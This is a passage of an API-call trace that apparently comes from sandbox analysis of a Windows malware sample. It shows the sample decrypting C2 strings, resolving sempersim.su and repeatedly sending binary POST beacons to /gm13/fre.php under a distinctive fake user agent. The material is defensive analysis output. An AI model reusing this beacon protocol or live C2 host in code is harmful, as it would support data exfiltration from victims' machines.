returned 0x620000 [0205.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0205.179] GetProcessHeap () returned 0x620000 [0205.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0205.179] closesocket (s=0x36c) returned 0 [0205.180] GetProcessHeap () returned 0x620000 [0205.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0205.180] GetProcessHeap () returned 0x620000 [0205.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0205.181] GetProcessHeap () returned 0x620000 [0205.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0205.181] GetProcessHeap () returned 0x620000 [0205.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0205.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x514) returned 0x36c [0205.183] Sleep (dwMilliseconds=0xea60) [0205.198] GetProcessHeap () returned 0x620000 [0205.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0205.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.206] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0205.214] GetProcessHeap () returned 0x620000 [0205.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0205.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.218] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0205.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.219] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.221] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.221] GetProcessHeap () returned 0x620000 [0205.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0205.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.223] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0205.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.225] CryptDestroyKey (hKey=0x62d190) returned 1 [0205.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.226] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0205.226] GetProcessHeap () returned 0x620000 [0205.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644d90 [0205.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.228] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.232] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.233] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.234] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.234] GetProcessHeap () returned 0x620000 [0205.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0205.234] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.234] GetProcessHeap () returned 0x620000 [0205.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0205.235] GetProcessHeap () returned 0x620000 [0205.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d90 | out: hHeap=0x620000) returned 1 [0205.235] GetProcessHeap () returned 0x620000 [0205.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0205.236] GetProcessHeap () returned 0x620000 [0205.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435f0 [0205.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.243] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0205.257] GetProcessHeap () returned 0x620000 [0205.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0205.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.258] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0205.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.259] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.260] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.260] GetProcessHeap () returned 0x620000 [0205.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0205.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.261] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435f0, pdwDataLen=0x19fcfc | out: pbData=0x6435f0, pdwDataLen=0x19fcfc) returned 1 [0205.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.263] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0205.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0205.264] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0205.264] GetProcessHeap () returned 0x620000 [0205.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6460f8 [0205.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.265] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0205.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.266] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0205.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.267] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0205.267] GetProcessHeap () returned 0x620000 [0205.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0205.267] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0205.269] GetProcessHeap () returned 0x620000 [0205.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b630 [0205.269] socket (af=2, type=1, protocol=6) returned 0x370 [0205.269] connect (s=0x370, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0205.322] FreeAddrInfoW (pAddrInfo=0x63c258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0205.322] GetProcessHeap () returned 0x620000 [0205.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0205.322] GetProcessHeap () returned 0x620000 [0205.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0205.324] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0205.325] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0205.325] GetProcessHeap () returned 0x620000 [0205.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0205.325] GetProcessHeap () returned 0x620000 [0205.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0205.325] GetProcessHeap () returned 0x620000 [0205.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0205.325] GetProcessHeap () returned 0x620000 [0205.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0205.326] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0205.327] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0205.327] GetProcessHeap () returned 0x620000 [0205.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0205.327] GetProcessHeap () returned 0x620000 [0205.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0205.327] send (s=0x370, buf=0x63a880*, len=237, flags=0) returned 237 [0205.328] send (s=0x370, buf=0x6421e0*, len=159, flags=0) returned 159 [0205.328] GetProcessHeap () returned 0x620000 [0205.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0205.328] recv (in: s=0x370, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0206.588] GetProcessHeap () returned 0x620000 [0206.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0206.589] GetProcessHeap () returned 0x620000 [0206.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0206.589] GetProcessHeap () returned 0x620000 [0206.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0206.590] GetProcessHeap () returned 0x620000 [0206.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0206.590] closesocket (s=0x370) returned 0 [0206.591] GetProcessHeap () returned 0x620000 [0206.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b630 | out: hHeap=0x620000) returned 1 [0206.591] GetProcessHeap () returned 0x620000 [0206.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6460f8 | out: hHeap=0x620000) returned 1 [0206.591] GetProcessHeap () returned 0x620000 [0206.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0206.592] GetProcessHeap () returned 0x620000 [0206.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0206.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8ac) returned 0x370 [0206.594] Sleep (dwMilliseconds=0xea60) [0206.604] GetProcessHeap () returned 0x620000 [0206.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0206.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.615] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0206.627] GetProcessHeap () returned 0x620000 [0206.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0206.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.628] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0206.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.629] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.630] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.630] GetProcessHeap () returned 0x620000 [0206.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0206.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.632] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0206.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.633] CryptDestroyKey (hKey=0x62d710) returned 1 [0206.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.634] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0206.634] GetProcessHeap () returned 0x620000 [0206.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0206.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.636] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0206.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.640] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0206.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.641] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0206.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.642] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0206.642] GetProcessHeap () returned 0x620000 [0206.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0206.643] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0206.643] GetProcessHeap () returned 0x620000 [0206.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0206.644] GetProcessHeap () returned 0x620000 [0206.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0206.644] GetProcessHeap () returned 0x620000 [0206.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0206.644] GetProcessHeap () returned 0x620000 [0206.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e10 [0206.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.645] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0206.661] GetProcessHeap () returned 0x620000 [0206.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0206.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.662] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0206.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.663] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.664] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.664] GetProcessHeap () returned 0x620000 [0206.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0206.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.665] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e10, pdwDataLen=0x19fcfc | out: pbData=0x642e10, pdwDataLen=0x19fcfc) returned 1 [0206.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.666] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0206.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0206.669] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0206.670] GetProcessHeap () returned 0x620000 [0206.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0206.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.671] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0206.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.672] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0206.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.673] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0206.673] GetProcessHeap () returned 0x620000 [0206.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0206.673] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bfb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0206.675] GetProcessHeap () returned 0x620000 [0206.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0206.675] socket (af=2, type=1, protocol=6) returned 0x374 [0206.676] connect (s=0x374, name=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0206.736] FreeAddrInfoW (pAddrInfo=0x63bfb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0206.736] GetProcessHeap () returned 0x620000 [0206.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0206.736] GetProcessHeap () returned 0x620000 [0206.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0206.737] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0206.738] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0206.738] GetProcessHeap () returned 0x620000 [0206.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0206.738] GetProcessHeap () returned 0x620000 [0206.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0206.738] GetProcessHeap () returned 0x620000 [0206.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0206.738] GetProcessHeap () returned 0x620000 [0206.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0206.739] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0206.740] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0206.740] GetProcessHeap () returned 0x620000 [0206.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0206.740] GetProcessHeap () returned 0x620000 [0206.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0206.741] send (s=0x374, buf=0x63a880*, len=237, flags=0) returned 237 [0206.741] send (s=0x374, buf=0x6421e0*, len=159, flags=0) returned 159 [0206.741] GetProcessHeap () returned 0x620000 [0206.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0206.741] recv (in: s=0x374, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0208.457] GetProcessHeap () returned 0x620000 [0208.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0208.457] GetProcessHeap () returned 0x620000 [0208.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0208.458] GetProcessHeap () returned 0x620000 [0208.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0208.458] GetProcessHeap () returned 0x620000 [0208.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0208.459] closesocket (s=0x374) returned 0 [0208.459] GetProcessHeap () returned 0x620000 [0208.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0208.459] GetProcessHeap () returned 0x620000 [0208.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0208.460] GetProcessHeap () returned 0x620000 [0208.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e10 | out: hHeap=0x620000) returned 1 [0208.461] GetProcessHeap () returned 0x620000 [0208.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0208.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x734) returned 0x374 [0208.475] Sleep (dwMilliseconds=0xea60) [0208.483] GetProcessHeap () returned 0x620000 [0208.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0208.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.484] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.491] 